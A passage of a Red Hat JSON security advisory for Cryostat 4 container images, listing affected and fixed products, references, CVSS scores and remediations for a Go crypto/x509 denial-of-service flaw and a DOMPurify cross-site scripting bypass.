"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64"
],
"known_not_affected": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-32281"
},
{
"category": "external",
"summary": "RHBZ#2456333",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456333"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-32281",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32281"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32281",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32281"
},
{
"category": "external",
"summary": "https://go.dev/cl/758061",
"url": "https://go.dev/cl/758061"
},
{
"category": "external",
"summary": "https://go.dev/issue/78281",
"url": "https://go.dev/issue/78281"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU",
"url": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4946",
"url": "https://pkg.go.dev/vuln/GO-2026-4946"
}
],
"release_date": "2026-04-08T01:06:58.354000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-22T17:15:26+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:28010"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "crypto/x509: golang: Go crypto/x509: Denial of Service via inefficient certificate chain validation"
},
{
"cve": "CVE-2026-41240",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2026-04-23T16:04:41.751666+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2461147"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in DOMPurify, a DOM-only cross-site scripting sanitizer. A remote attacker could exploit an inconsistency in how forbidden tags and attributes are handled when function-based tag additions are used. This allows malicious HTML, MathML, or SVG elements to bypass sanitization and execute arbitrary code in the user\u0027s browser, leading to Cross-Site Scripting (XSS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "DOMPurify: DOMPurify: Cross-Site Scripting (XSS) via inconsistent tag sanitization",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64"
],
"known_not_affected": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-41240"
},
{
"category": "external",
"summary": "RHBZ#2461147",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461147"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-41240",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41240"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-41240",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41240"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/commit/c361baa18dbdcb3344a41110f4c48ad85bf48f80",
"url": "https://github.com/cure53/DOMPurify/commit/c361baa18dbdcb3344a41110f4c48ad85bf48f80"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/releases/tag/3.4.0",
"url": "https://github.com/cure53/DOMPurify/releases/tag/3.4.0"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-h7mw-gpvr-xq4m",
"url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-h7mw-gpvr-xq4m"
}
],
"release_date": "2026-04-23T14:54:32.426000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-22T17:15:26+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:28010"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "DOMPurify: DOMPurify: Cross-Site Scripting (XSS) via inconsistent tag sanitization"
},
{
"cve": "CVE-2026-42578",
"cwe": {
"id": "CWE-93",
